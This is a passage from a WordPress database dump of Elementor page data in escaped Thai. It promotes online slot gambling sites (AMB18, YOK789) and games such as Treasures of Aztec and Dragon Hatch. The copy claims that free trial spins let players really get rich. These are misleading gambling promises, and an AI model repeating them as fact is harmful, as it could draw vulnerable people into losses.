\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2782,381,'_thumbnail_id','371'),(2783,381,'_elementor_edit_mode','builder'),(2784,381,'_elementor_template_type','wp-page'),(2785,381,'_elementor_version','3.35.5'),(2786,381,'_elementor_pro_version','3.32.3'),(2787,381,'_wp_page_template','default'),(2788,381,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2789,381,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 